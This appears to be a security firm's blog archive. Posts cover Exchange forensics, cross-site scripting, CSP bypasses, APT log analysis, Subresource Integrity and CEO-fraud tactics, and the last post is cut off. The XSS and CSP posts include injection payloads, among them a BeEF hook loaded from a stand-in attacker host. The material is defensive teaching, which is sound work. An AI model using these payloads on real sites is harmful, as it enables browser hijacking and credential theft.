Exchange Forensics

Introduction

The number one form of communication in corporate environments is email. Alone in 2015, the number of business emails sent and received per day were estimated to be over 112 billion [1] and employees spend on average 13 hours per week in their email inbox [2]. Unfortunately, emails are at times also misused for illegitimate communication. Back in the days when the concept of email was designed, security was not the main focus of the inventors and some of the design short comings are still problematic today. The sender rarely uses encryption and the receiver cannot check the integrity of unprotected emails. Not even the metadata in the header of an email can be trusted as an attacker can easily forge this information. Even though many attempts have been made into securing email communication, there are still a lot of unsecured emails sent every day. This is one of the reasons why attackers still exploit weaknesses in email communication. In our experience, a lot of forensic investigations include an attacker either stealing/leaking information via email or an employee unintentionally opening Malware he received via email. Once this has happened, there is no way around a forensic investigation in order to answer key question such as who did what, when and how? Because many corporate environments use Microsoft Exchange as mailing system, we cover some basics on what kind of forensic artifacts the Microsoft Exchange environment provides.

Microsoft Exchange Architecture

In order to understand the different artifacts we first take a look at the basic Microsoft Exchange architecture and the involved components. The diagram below this paragraph shows the architectural concepts in the On-premises version of Exchange 2016. Edge Transport Servers build the perimeter of the email infrastructure. They handle external email flow as well as apply antispam and email flow rules. Database availability groups (DAGs) form the heart of Microsoft’s Exchange environment. They contain a group of Mailbox servers and host a set of databases. The Mailbox servers contain the transport services that are used to route emails. They also contain the client access service, which is responsible for routing or proxying connections to the corresponding backend services on a Mailbox server. Clients don’t connect directly to the backend services. When a client sends an email through the Microsoft Exchange infrastructure, it always traverses at least one Mailbox server.

architecture[3] (Exchange 2016 Architecture, Microsoft)

Compliance Features

Microsoft Exchange provides multiple compliance features. Each of those compliance features provides a different set of information to an investigator and it is important to have a basic understanding of their behavior in order to understand which feature can provide answer to which question. The most important compliance features are covered in the following paragraphs.

Message Tracking

The message tracking compliance feature writes a record of all activity as emails flow through Mailbox servers and Edge Transport servers into a log file. Those logs contain details regarding the sender, recipient, message subject, date and time. By default the message tracking logs are stored for a maximum of 30 days if the size of the log files does not grow bigger than 1000MB.

The following example shows the message tracking log entries created when the user “alice@csnc.ch” sends a message with the MessageSubject “Meeting” to the user “bob@csnc.ch“. Note that in this example both users have their mailboxes on the same server.

EventId    Source      Sender        Recipients    MessageSubject
-------    ------      ------        ----------    --------------
NOTIFYMAPI STOREDRIVER               {}
RECEIVE    STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting
SUBMIT     STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting
HAREDIRECT SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
RECEIVE    SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
AGENTINFO  AGENT       alice@csnc.ch {bob@csnc.ch} Meeting
SEND       SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
DELIVER    STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting

The message content is not stored as part of message tracking logs. By default, the subject line of an email message is stored in the tracking logs, however this can be disabled in the configuration settings. [4]

Single Item Recovery

Single Item Recovery is a compliance feature that essentially allows you to recover individual emails without having to restore them from a full database backup. If a user deletes an email in Outlook, it goes to the “Deleted Items” folder. When the user deletes this email from the “Deleted Items” folder, the email will be placed into the “Dumpster” (soft delete). The following screenshots show how the “Dumpster” can be accessed:

recover_deleted_items1[5] (Recover deleted items in Outlook, Microsoft)

When clicking on the “Recover Deleted Items” trash symbol, the “Dumpster” gets opened as shown on the following screenshot:

recover_deleted_items2

[5] (Recover deleted items in Outlook, Microsoft)

From the “Dumpster”, messages can either be recovered or purged completely (hard delete). They can still be recovered if a backup of the mailbox is available of course. When Single Item Recovery is enabled it means that emails remain recoverable for administrators, even if the mailbox owner deletes the messages from the inbox, empties the “Deleted Items” folder and then purges the content of the “Dumpster”. Single Item Recovery is not enabled by default and has to be enabled prior to the date of an investigation. In order to recover a message, the following information is needed [6]:

  • The source mailbox that needs to be searched.
  • The target mailbox into which the emails will be recovered.
  • Search criteria such as sender, recipient or keywords in the message.

With the information above, an email can be found using the Exchange Management Shell (EMS) as shown in the following example.

Search-Mailbox "Alice" -SearchQuery "from:Bob" -TargetMailbox "Investigation Search Mailbox" -TargetFolder "Alice Recovery" -LogLevel Full

In-Place Hold

In-Place Hold can be used to preserve mailbox items. If this compliance feature is enabled, an email will be kept, even if it was purged by a user (deleted from the “Dumpster” folder). Also if an item is modified, a copy of the original version is retained. The In-Place hold is usually activated during investigations in order to preserve the Mailbox content of an individual. The individual do not notice that they are “on hold”. A query with parameters can be used to granularly define the scope of items to hold. By default In-Place Hold is disabled and if neither Single Item Recover nor the In-Place Hold is enabled, an email will be permanently deleted if a user purges (deletes) it from the “Dumpster.

Mailbox Auditing

Mailboxes can contain sensitive information including personally identifiable information (PII). Therefore it is important that it gets tracked who logged on to a mailbox and which actions were taken. It is especially important to track access to mailboxes by users other than the mailbox owner, the so called delegates.

By default mailbox auditing is disabled and when enabled it requires more space on the corresponding mailbox. If enabled, one can specify which user actions (for example, accessing, moving, or deleting a message) are logged per logon type (administrator, delegate user, or owner). Audit log entries also include further important information such as the client IP address, host name, and processes or clients used to access the mailbox. If the auditing policy is configured to only include key records such as sending or deleting items there is no noticeable impact in terms of storage and performance.

Administrator Auditing

This compliance feature is used to log changes that an administrator makes to the Exchange Server configuration. By default, the log files are enabled and kept for 90 days. Changes to the administrator auditing configuration are always logged. The log files are stored in a hidden dedicated mailbox which cannot be opened in Outlook or OWA.

Others

Exchange email flow rules, also known as transport rules can be used to look for specific conditions in messages that pass through an Exchange Server. Those rules are similar to the Inbox rules, a lot of email client’s offer. The main difference between an email flow rule and a rule one would setup in an email client is that email flow rules take action on messages while they are in transit, as opposed to after the message is delivered. Further, email flow rules have a richer set of conditions, exceptions as well as actions, which provide the flexibility to implement many types of messaging policies. [7]

Journaling allows recording a copy of all email communications and sending it to a dedicated mailbox on an Exchange Server. Archiving on the other hand can be used to backup up data, removing it from its native environments and store a copy on another system. Finally there is always the option of a full backup of an Exchange database. This creates and stores a complete copy of the database file as well as transaction logs.

Summary

As we have seen, Microsoft Exchange provides various compliance features that help during forensic investigations involving email analysis. Having an understanding of which artifacts are available is key. The following table summarises the compliance features discussed in this post:

summary_table

Courses and Beer-Talk Reference

In order to directly share our experience in this field we choose “Exchange Forensics” as topic for our upcoming beer talks. Don’t hesitate to sign up if you are interested. For more information click on the link next to the location you would like to attend:

If you like to dive even deeper, we provide the Security Training: Forensic Investigations. It covers:

  • Introduction to forensic investigations
  • Chain of custody
  • Imaging
  • Basic of file systems
  • Traces in slack space
  • Traces in office documents
  • Analysis of windows systems
  • Analysis of network dumps
  • Analysis of OSX systems
  • Analysis of mobile devices
  • Forensic readiness
  • Log analysis

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-forensik-investigation/ or get in touch if you have questions.

Sources and References:

[0] E-mail Forensics in a Corporate Exchange Environment, Nuno Mota, http://www.msexchange.org/articles-tutorials/exchange-server-2013/compliance-policies-archiving/e-mail-forensics-corporate-exchange-environment-part1.html

[1] Email-Statistics-Report-2015-2019, The Radicati Group, Inc., http://www.radicati.com/wp/wp-content/uploads/2015/02/Email-Statistics-Report-2015-2019-Executive-Summary.pdf

[2] the-social-economy, McKinsey & Company, http://www.mckinsey.com/industries/high-tech/our-insights/the-social-economy

[3] Exchange 2016 Architecture, Microsoft, https://technet.microsoft.com/de-ch/library/jj150491(v=exchg.160).aspx

[4]  Message Tracking, Microsoft, https://technet.microsoft.com/en-us/library/bb124375(v=exchg.160).aspx

[5] Recover deleted items in Outlook, Microsoft, https://support.office.com/en-us/article/Recover-deleted-items-in-Outlook-2010-cd9dfe12-8e8c-4a21-bbbf-4bd103a3f1fe

[6] Recover deleted messages in a user’s mailbox, Microsoft, https://technet.microsoft.com/en-us/library/ff660637(v=exchg.160).aspx

[7] Mail flow or transport rules Microsoft, https://technet.microsoft.com/en-us/library/jj919238(v=exchg.150).aspx

Cross-Site Scripting

Cross-Site Scripting is harmless? Think again!

Cross-Site Scripting, oftentimes referred to as “XSS”, is a common vulnerability of web applications. This vulnerability refers to the incorrect behavior of a web application to insufficiently encode user provided data when displaying it back to the user. If this is the case, attackers are able to inject malicious code, for instance JavaScript, into the affected website.

xssOne of our main tasks at Compass Security is testing web applications for security issues. Thus, we can safely say that many current web applications are affected by this type of vulnerability, even though protecting against it is simple. For simplicity reasons, XSS is usually depicted as a popup window displaying simple text.

Such a popup would be induced by the following code:

<script>alert(0)</script>

The entire attack would look as follows, given that the parameter param is vulnerable. Assume that the following code is used by a web application without employing output encoding:

<input type="text" name="param" value="user_input">

Here, user_input is the non-output encoded data provided by the user.

Then, an attacker can exploit this by setting param to

“><script>alert(0)</script><!–

which will lead to the following being sent to the user:

<input type=”text” name=”param” value=”“><script>alert(0)</script><!–“>

resulting in the above popup being displayed.

When discussing XSS with customers, one of the more common statements we hear is: “this issue is harmless; it only displays text in a popup window”. This is not true, however, since XSS is far more powerful than often suspected. It allows an attacker to take full control over the victim’s browser. The victim, in this case, is the user who visits the attacked website. Common attack vectors include the victim’s session cookie being stolen, if it is not protected by the so-called HttpOnly flag. Further, the affected website can be manipulated so that the user is redirected to a Phishing website, allowing the attacker to obtain the user’s credentials. Finally, if the victim’s browser is outdated and contains known vulnerabilities, these can directly be exploited via Cross-Site Scripting and, if successful, lead to the victim’s computer being compromised.

beefMany of the above-mentioned attack vectors can be very easily tested using the BeEF (Browser Exploitation Framework) Framework (http://beefproject.com/). This framework provides many attack vectors that can be used by including just one malicious JavaScript file into the vulnerable website. Hence, instead of the above code (“><script>alert(0)</script><!–), the following would be injected:

“><script src=http://attacker.com/hook.js></script><!–

where attacker.com is an attacker-controlled website and hook.js is the malicious JavaScript file that will allow the BeEF server on the attacker’s machine to take control over the victim’s browser.

Once the victim’s browser executes the injected JavaScript, it is “hooked”, that is, in the attacker’s control, allowing them to obtain all kinds of information such as the user’s cookies, browser type and version, etc.:

beef_hook

Among many different types of attack vectors, BeEF allows, e.g., displaying a password prompt to the user (in the user’s browser):

beef_password_alertOnce the user entered their password, it is sent to the attacker:

beef_password_resultHow to protect against such attacks?

Simple! Just encode user-provided data before echoing it back to the user. An effective method is to use HTML entities:
is encoded as &quot;,
< is encoded as &lt;,
and so forth (for a detailed explanation, refer to https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).

If you want to see this any many more typical web application vulnerabilities, try them out yourself, and learn how to defend against them, register for our next Web Application Security course:

https://www.compass-security.com/services/security-trainings/

The Web Application Security (Basic/Advanced) courses will introduce all major web application attack vectors via theory and hands-on challenges in our Hacking-Lab:

https://www.hacking-lab.com/

Content-Security-Policy: misconfigurations and bypasses

Introduction

The Content Security Policy (CSP) is a security mechanism web applications can use to reduce the risk of attacks based on XSS, code injection or clickjacking. Using different directives it is possible to lock down web applications by implementing a whitelist of trusted sources from which web resources like JavaScript may be loaded. Currently the CSP version 2 is supported by Firefox, Google Chrome, and Opera, whereas other browsers provide limited support or no support at all (Internet Explorer)[4].

The CSP has two modes of operation [7]: enforcing and report-only. The first one can be used to block and report attacks whereas the second one is used only to report abuses to a specific reporting server. In this blog post, we will focus only on the enforcing mode.

The policy, in order to work, has to be included in each HTTP response as a header (“Content-Security-Policy:”). The browser will then parse the CSP and check if every object loaded in the page adheres to the given policy. To specify these rules, the CSP provides different directives [5]:

  • script-src: defines valid sources of JavaScript
  • object-src: defines valid sources of plugins, like <objects>
  • img-src: defines valid sources of images
  • style-src: defines valid source of stylesheets
  • report-uri: the browser will POST a report to this URI in case of policy violation

Each of these directives must have a value assigned, which is usually a list of websites allowed to load resources from. The default behavior of directives if omitted, is to allow everything (“*”) without restrictions [9]. A basic example of a valid CSP is shown below:

Content-Security-Policy: default-src 'self'; script-src compass-security.com

The directive “default-src” is set to ‘self’, which means same origin. All resources without a directive set are allowed to be loaded only from the same origin, in this case “blog.compass-security.com”. Setting the “default-src” directive can be a good start to deploy your CSP as it provides a basic level of protection. “script-src” is used to allow all JavaScripts to be loaded from the domain “compass-security.com”, via HTTP (https:// should be explicitly specified) without allowing subdomains. These could be specified directly (e.g. sub.compass-security.com) or using the “*” wildcard (*.compass-security.com)

Misconfigurations and Bypasses

Even though it is possible to have a good level of control over the policy, errors in the definition of directives may lead to unexpected consequences. Misconfiguration or ambiguities can render the policy less efficient or easy to bypass. In addition, the functionality of the application could also be broken. The following example illustrates what can happen if “default-src” is omitted:

Content-Security-Policy: script-src compass-security.com

Now, all the scripts with source “compass-security.com” are allowed. But what about the other objects like stylesheets or flash applets? The policy above can be bypassed for example using this payload, which triggers an alert box using a Flash object[7]:

">'><object type="application/x-shockwave-flash" 
data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/
assets/charts.swf?allowedDomain=\"})))}catch(e{alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

One other common mistake is the inclusion of the dangerous “unsafe-inline” or “unsafe-eval” directives. These allow the execution of potentially malicious JavaScript directly via “<script>” tags or eval():

Content-Security-Policy: default-src 'self'; script-src compass-security.com 'unsafe-inline';

This policy defines the default source as “self” and allows the execution of script from “compass-security.com” but, at the same time, it allows the execution of inline scripts. This means that the policy can be bypassed with the following payload [7]:

">'><script>alert(1337)</script>

The browser will then parse the JavaScript and execute the injected malicious content.

Besides these trivial misconfigurations shown above, there are some other tricks used to bypass CSP that are less common and known. These make use, for example, of JSONP (JSON with padding) or open redirects. Let’s take a look at JSONP bypasses.

If the CSP defines a whitelisted JSONP endpoint, it is possible to take advantage of the callback parameter to bypass the CSP. Assuming that the policy is defined as follows:

Content-Security-Policy: script-src 'self' https://compass-security.com;

The domain compass-security.com hosts a JSONP endpoint, which can be called with the following URL:

https://compass-security.com/jsonp?callback={functionName}

Now, what happens if the {functionName} parameter contains a valid JavaScript code which could be potentially executed? The following payload represents a valid bypass [7]:

">'><script src="https://compass-security.com/jsonp?callback=alert(1);u">

The JSONP endpoint will then parse the callback parameter, generating the following response:

Alert(1); u({……})

The JavaScript before the semicolon, alert(1), will be executed by the client when processing the response received.

URLs with open redirects could also pose problems if whitelisted in the CSP. Imagine if the policy is set to be very restrictive, allowing only one specific file and domain in its “script-src” directive:

Content-Security-Policy: default-src: 'self'; script-src https://compass-security.com/myfile.js https://redirect.compass-security.com

At first sight, this policy seems to be very restrictive: only the myfile.js can be loaded along with all the scripts originating from “redirect.compass-security.com” which is a site we trust. However, redirect.compass-security.com performs open redirects through a parameter in the URL. This could be a possible option to bypass the policy [7]:

">'><script src="https://redirect.compass-security.com/redirect?url=https%3A//evilwebsite.com/jsonp%2Fcallback%3Dalert">

Why is it possible to bypass the CSP using this payload? The CSP does not check the landing page after a redirect occurs and, as the source of the script tag “https://redirect.compass-security.com” is whitelisted, no policy violation will be triggered.

These are only a small subset of possible CSP bypasses. If you are interested, many of them can be found at [6] or [7].

The “nonce” directive

Besides the whitelist mechanism using URLs, in the CSP2 there are other techniques that can be used to block code injection attacks. One of these is represented for example by “nonces”.

Nonces are randomly generated numbers that should be defined in the CSP and included only inside <script> or <style> tags to identify resources and provide a mapping between the policy and the client’s browser. An attacker injecting a payload containing a script tag has no knowledge of the nonce previously exchanged between the client and the server, resulting in the CSP detecting this and throwing a policy violation. A possible configuration of a CSP with nonces could be:

Content-Security-Policy: script-src 'nonce-eED8tYJI79FHlBgg12'

The value of the nonce (which should be random, unpredictable, generated with every response, and at least 128 bits long [10]) is “eED8tYJI79FHlBgg12”.

This value should be then passed to each script tag included in our application’s pages:

<script src="http://source/script.js" nonce="eED8tYJI79FHlBgg12">

The browser will then parse the CSP, check if the scripts included have a matching value and block those that do not include any valid nonce. This technique works great against stored XSS, as the attacker cannot include valid nonces at injection time. Another advantage is that there is no need to maintain whitelists of allowed URLs, as the nonce acts as an access token for the <script> tag and not necessarily for the source of the script. It is also possible to use hashes in order to identify the content of each <script> element inside the page, more information about this feature can be found at [8].

Conclusion

We have seen that the CSP is a very useful tool web developers can use to have better control on the loaded resources. The different directives provide flexibility to allow or deny potentially dangerous web resources inside web pages. However, it is also easy to make errors if too many URLs are whitelisted (e.g. hidden JSONP endpoints). Here at Compass we encourage the use of the CSP as an additional barrier against web threats. Nonetheless, I would like to stress that the first protection against code injection should always be provided by a solid input/output validation, which can help also against other common attacks like SQL injections.

If you would like to get more information about how web applications should be protected, or you want to deepen your web security knowledge we provide different trainings:

We are also offering trainings in other areas of IT Security. You can check the different topics here:

Sources & References

  1. https://www.owasp.org/index.php/Content_Security_Policy
  2. https://www.w3.org/TR/CSP2/#intro
  3. https://w3c.github.io/webappsec-csp/#match-element-to-source-list
  4. http://caniuse.com/#search=Content%20Security%20Policy%20Level%202
  5. http://content-security-policy.com/
  6. https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it’s-CSP!%22.
  7. http://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf
  8. https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/
  9. http://www.html5rocks.com/en/tutorials/security/content-security-policy/
  10. https://www.w3.org/TR/CSP/#source_list

APT Detection & Network Analysis

Until recently, the majority of organizations believed that they do not have to worry about targeted attacks, because they consider themselves to be “flying under the radar”. The common belief has been: “We are too small, only big organizations like financial service providers, military industry, energy suppliers and government institutions are affected”.

However, this assumption has been proven wrong since at least the detection of Operation ShadyRAT[0], DarkHotel[1] or the recent “RUAG Cyber Espionage Case”[2]. The analysis of the Command & Control (C&C) servers of ShadyRAT revealed that a large-scale operation was run from 2006 to 2011. During this operation 71 organizations (private and public) were targeted and spied on. It is assumed that these so-called Advanced Persistent Threats (APT) will even increase in the near future.

We at Compass Security are often asked to help finding malicious actions or traffic inside corporate networks.

The infection, in most cases, is a mix of social engineering methods (for example spear phishing) and the exploitation of vulnerabilities. This actually varies from case to case. Often we observe in proxy logs, that employees were lured into visiting some phishing sites which are designed to look exactly like the corporation’s Outlook Web Access (OWA) or similar applications/services as being used by the targeted company.

Typically, this is not something you can prevent exclusively with technical measures – user awareness is the key here! Nevertheless, we are often called to investigate when there still is some malware activity in the network. APT traffic detection can then be achieved with the correlation of DNS, mail, proxy, and firewall logs.

Network Analysis & APT Detection

To analyze a network, Compass Analysts first have to know the network’s topology to get an idea of how malware (or a human attacker) might communicate with external servers. Almost every attacker is going to exfiltrate data at some point in time. This is the nature of corporate/industrial espionage. Further, it is important to find out whether the attacker gained access to other clients or servers in the network.

For the analysis, log files are crucial. Many companies are already collecting logs on central servers [3], which speeds up the investigation process, since administrators don’t have to collect the logs from many different sources (which sometimes takes weeks), and off-site logs are more difficult to clear by attackers.

To analyze logs and sometimes traffic dumps, we use different tools like:

ELK offers many advantages when it comes to clustering and configuration, but it doesn’t offer many pre-configured log parser rules. If you are lucky, you can find some for your infrastructure on GrokBase[4]. Otherwise there are plenty of tools helping you to build them on your own, such as e.g. Grok Debugger[5].

However, when analysis has to be kick-started fast, and you do not have time to configure large rulesets – Splunk comes with a wide range of pre-configured parsers.

After we gathered all logs (and in some cases traffic dumps), we feed them into Splunk/ELK/Moloch for indexing.

In a first step we try to clean the data set by removing noise. To achieve this, we identify known good traffic patterns and exclude them. Of course it is not always straight forward to distinguish between normal and suspicious traffic as some malware uses for example Google Docs for exfiltration. It takes some time to understand what the usual traffic in a network looks like. To clean the data set even more, we then look for connections to known malware domains.

There are plenty of lists available for this:

If we are lucky, the attacker used infrastructure provided by known malware service providers (individuals and organizations are selling special services just for the purpose of hosting malware infrastructure). But more sophisticated attacks will most likely use their own infrastructure.

After cleaning out the data sets, we look for anomalies in the logs (e.g. large amounts of requests, single requests, big DNS queries, etc.). Some malware is really noisy and as a consequence, easy to find. Some samples are connecting to their C&C servers in a high frequency. Other samples are requesting commands form C&C servers at regular time intervals (Friday 20:00 for example). Others connect just once.

Sometimes we also detect anomalies in the network infrastructure which are caused by employees, for example heavy usage of cloud services such as Google Drive or Dropbox. Often these constitute to so-called false positives.

To share our experiences and knowledge in this field, we created the Security Training: Network Analysis & APT.

This training will cover:

  • Configuration of evidence (What logs are needed?)
  • Static and Dynamic Log Analysis with Splunk
    • Splunk Basics and Advanced Usage
    • Detecting anomalies
    • Detecting malicious traffic
  • Attack & Detection Challenges

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-network-anlysis-apt/ or get in touch if you have questions.

The next upcoming training is on 22. and 23. September 2016 in Jona, click here to register.

Sources & References:
[0] Operation Shady RAT, McAfee, http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf
[1] The Darkhotel APT, Kaspersky Lab Research, https://securelist.com/blog/research/66779/the-darkhotel-apt/
[2] Technical Report about the Malware used in the Cyberespionage against RUAG, MELANI/GovCERT, https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html
[3] “Challenges in Log-Management”, Compass Security Blog, http://blog.csnc.ch/2014/10/challenges-in-log-management/
[4] GrokBase, http://grokbase.com/
[5] Grok Debugger, https://grokdebug.herokuapp.com/
[x.0] APT Network Analysis with Splunk, Compass Security, Lukas Reschke, https://www.compass-security.com/fileadmin/Datein/Research/White_Papers/apt_network_analysis_w_splunk_whitepaper.pdf
[x.1] Whitepaper: Using Splunk To Detect DNS Tunneling, Steve Jaworski, https://www.sans.org/reading-room/whitepapers/malicious/splunk-detect-dns-tunneling-37022

Windows Phone – Security State of the Art?

Compass Security recently presented its Windows Phone and Windows 10 Mobile research at the April 2016 Security Interest Group Switzerland (SIGS) event in Zurich.

The short presentation highlights the attempts made by our Security Analysts to bypass the security controls provided by the platform and further explains why bypassing them is not a trivial undertaking.

Windows 10 Mobile, which has just been publicly released on 17th March 2016, has further tightened its hardware-based security defenses, introducing multiple layers of protection starting already at boot time of the platform. Minimum hardware requirements therefore include the requirement for UEFI Secure Boot support and a Trusted Platform Module (TPM) conforming to the 2.0 specification. When connected to a MDM solution the device can use the TPM for the new health attestation service to provide conditional access to the company network, its resources and to trigger corrective measures when required.

Compared to earlier Windows Phone versions, Windows 10 Mobile finally allows end-users without access to an MDM solution or ActiveSync support to enable full disk encryption based on Microsoft BitLocker technology. Companies using an MDM solution also have fine grained control over the used encryption method and cipher strength. Similar control can be applied to TLS cipher suites and algorithms.

Newly introduced features also include the biometric authentication using Windows Hello (selected premium devices only for the moment) or the Enterprise Data Protection (EDP) which helps separating personal and enterprise data and serves as a data loss protection solution. EDP requires the Windows 10 Mobile Enterprise edition and is currently available to a restricted audience for testing purposes.

Similar to Windows 10 for workstations the Mobile edition automatically updates. Users of the Windows 10 Mobile Enterprise edition however have the option to postpone the downloading and installation of updates.

In addition the presentation introduces the Windows Bridges that will help developers to port existing mobile applications to the new platform. While a preview version for iOS (Objective C) has been made publicly available, Microsoft recently announced that the Windows Bridges for Android project has been cancelled. In the same week Microsoft announced the acquisition of Xamarin, a cross-platform development solution provider to ease the development of universal applications for the mobile platform.

The slides of the full presentation can be downloaded here.

References:

This blog post resulted from internal research which has been conducted by Alexandre Herzog and Cyrill Bannwart.

Compass Security nominated by Prix SVC

Compass Security proudly announces its nomination for the Prix SVC (Swiss Venture Club) award 2016. Out of 180 companies, Compass Security was selected as one of the most innovative companies in the eastern region of Switzerland. Because the award ceremony is being broadcasted by TVO, we had to slip into a tuxedo and play the “license to hack” story. Please watch the teaser video on YouTube!

spr_butScreen Shot 2016-02-17 at 12.04.07

The award ceremony will be held on March 10th, 2016 at the Olma Hallen in St. Gallen. We don’t yet know the final score but we will keep you updated.

Thank you for the trust and confidence you have in Compass Security!!

Walter & Ivan

 

Presentation on SAML 2.0 Security Research

Compass Security invested quite some time last year in researching the security of single sign-on (SSO) implementations. Often SAML (Security Assertion Markup Language) is used to implement a cross-domain SSO solution. The correct implementation and configuration is crucial for a secure authentication solution. As discussed in earlier blog articles, Compass Security identified vulnerabilities in SAML implementations with the SAML Burp Extension (SAML Raider) developed by Compass Security and Emanuel Duss.

Antoine Neuenschwander and Roland Bischofberger are happy to present their research results and SAML Raider during the upcoming

Beer-Talks:
– January 14, 2016, 18-19 PM, Jona
– January 21, 2016, 18-19 PM, Bern

Free entrance, food and beverage. Registration required.

Get more information in our Beer-Talk page and spread the word. The Compass Crew is looking forward to meeting you.

Subresource Integrity HTML Attribute

Websites nowadays are mostly built with different resources from other origins. For example, many sites include scripts or stylesheets like jQuery or Bootstrap from a Content Delivery Network (CDN). This induces that the webmasters implicitly trust the linked external sources. But what if an attacker can force the user to load the content from an attacker controlled server instead of the genuine resource (e.g. by DNS poisoning, or by replacing files on a CDN)? A security-aware webmaster had no chance to protect his website against such an incident.

This is the point where Subresource Integrity kicks in. Subresource Integrity ensures the integrity of external resources with an additional attribute for the two HTML tags <link> and <script>. The integrity attribute contains a cryptographic hash of the external resource which should be integrated in the site. The browser then checks if the hash of the fetched resource and the hash in the HTML attribute are identical.

Bootstrap example:

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs8" crossorigin="anonymous">

In the example above, resource bootstrap.min.css is checked for its integrity with its Base64 encoded SHA-384 hash. If the integrity check is positive, the browser applies the stylesheet (or executes the script in the case of a <script> tag). If the check fails, the browser must refuse to apply the stylesheet or execute the script. The user is not informed if the check has failed and a resource therefore could not be loaded. The failed request can only be seen in the developer tools of the used browser. The following image shows the error message in the Chrome developer tools.

Console in browser does inform about subresource integrity check fail.

Console in browser does inform about subresource integrity check fail.

The crossorigin attribute in the example configures the CORS request. A value anonymous indicates, that requests for this element will not have set the credentials flag and therefore no cookies would be sent. A value of use-credentials would indicate, that the request will provide cookies to authenticate.

The subresource integrity attribute is currently being reviewed before becoming a W3C standard but is already supported by Chrome 45≤ , Firefox 43≤ and Opera 32≤.

Concluding, the subresource integrity attribute offers better possibilities for webmasters to ensure the integrity of external resources. However, this attribute is not supported by older browsers and needs to be adjusted at every resource change. In the end, a security aware webmaster will keep more control with less effort by keeping all resources hosted on his own servers.

Come’n’Hack Day 2015

Being a security analyst at Compass Security is an interesting thing, no doubt. Besides interesting projects, there is plenty of know-how transfer and interactions between the employees. For example, each year, all security analysts come together for an event called Come’n’Hack Day. During this year’s event, they had the pleasure to perform an attack/defense hacking contest against each other.

IMG_1447

Hacking-Lab‘s new Capture The Flag (CTF) system was used for this purpose. It was only the second time this system was used for an event, after the premiere at the European Cyber Security Challenge final last October in Lucerne.

IMG_6058

The participants were spread on three teams: Proxy Foxes, Lucky Bucks and Chunky Monkeys. Each team owned servers with running applications, and had different tasks to perform in order to get points:

  • ATTACK – Attack the other team’s applications, and steal a gold nugget.
  • DEFENSE – Protect its own applications.
  • CODE-PATCHING – Find and patch vulnerabilities in its own applications.
  • AVAILABILITY – Keep the own applications up and running.
  • JEOPARDY – Solve hacking challenges (cryptography, networking, etc.).
  • POWNED – Try to exploit the other teams’ servers.

After a hard fight, the Chunky Monkeys grabbed the first place, closely followed by the Lucky Bucks:

scoring

Almost one hundred gold nuggets were stolen during the day:gold_nuggets

All attendees enjoyed the highly eventful day. With six different ways to score points, each participant could contribute to its team’s success. This makes such a CTF occasion not only a great social event idea for security analysts but potentially for any organization having technical skilled employees (IT security officers, sysadmins and/or developers)!

What is a “Fake President Fraud” and how to Protect Your Company

“Fake President Fraud” or “CEO Fraud” is a social engineering attack where an adversary tries to convince a member of the financial department of a company to send out a payment to the attacker’s bank account. The attack can be divided into three steps.

  1. Establish Contact:
    Typically only employees responsible for bank transfers get contacted by the adversary, as they have all needed permissions to execute payments. Therefore the criminal impersonates a CEO or any other superior who has enough authority to arrange urgent payments.
    These kind of social engineering attacks work if the adversary gathers enough information about the individual he wants to impersonate. As most CEO’s are referenced on the world wide web with detailed personal information such as curriculum vitae and email address, it is easy for an attacker to gather everything he needs to fake a CEO email. Furthermore, company websites often disclose information about customers and other useful details which help an adversary to be more convincingly when requesting a payment.
  2. Request Payment Transaction:
    The attacker often uses email (spear phishing) or phone calls (vishing) to contact his target. Whereby a phone call only works if the victim does not know the voice of the impersonated superior, an attack over email has no such restrictions.
    The request itself is about an urgent payment to a foreign bank account and uses a variety of pretexts such as acquisitions or customer projects. For this step to succeed, the criminal uses different elements to convince the target to be compliant to his request and send out the payment:

    1. Authority: Asking the target as an authority adds a strong argument to every request. Jonathan J. Rusch writesPeople are highly likely, in the right situation, to be highly responsive to assertions of authority, even when the person who purports to be in a position of authority is not physically present.” One of the most impressive experiment in social psychology history, which demonstrated the blind obedience to authority figures, is the Stanley Milgram experiment.
    2. Valorization: The “fact” that the CEO or a superior has “chosen” this specific employee implies that he trusts him. The feeling of being trusted makes the body release oxytocin, often referred as the “love hormone”. This hormones facilitates trust and attachment between individuals. This is an additional factor that helps the attacker to quickly build feelings of rapport and to convince the target to be compliant to his request and send out the payment.
    3. Secrecy: In order to avoid that a target verifies the authenticity and validity of an order, attackers often label the request as “STRICTLY CONFIDENTIAL” or insert statements like “this project is still secret and its success depends on this transaction”.
    4. Pressure: Shifting all the responsibility for the success or failure of a project to the target’s shoulder, the attacker put a lot of pressure on him. This will induce the victim to be more compliant and execute the request.
    5. Urgency: Urgency and authority is a good combination to convince the target to perform the payment as fast as possible. The attacker creates a false sense of urgency in order to get the target to make a rushed judgment or a rash decision. Example email:ceofraud
  3. Transfer Money:
    If the attacker manages to convince the targeted employee to send out the payment, the money gets transferred to the foreign bank’s account.

 

Now the question arises what a company can do to avoid a “Fake President Fraud”. Different organizational and technical steps can be done to mitigate the risk of an incident.

  1. Organizational:
    1. If possible email or phone communication should not be allowed when authorizing large payments. Therefore face-to-face meetings should be mandatory.
    2. Develop and communicate guidelines and processes of how payment transactions need to be handled.
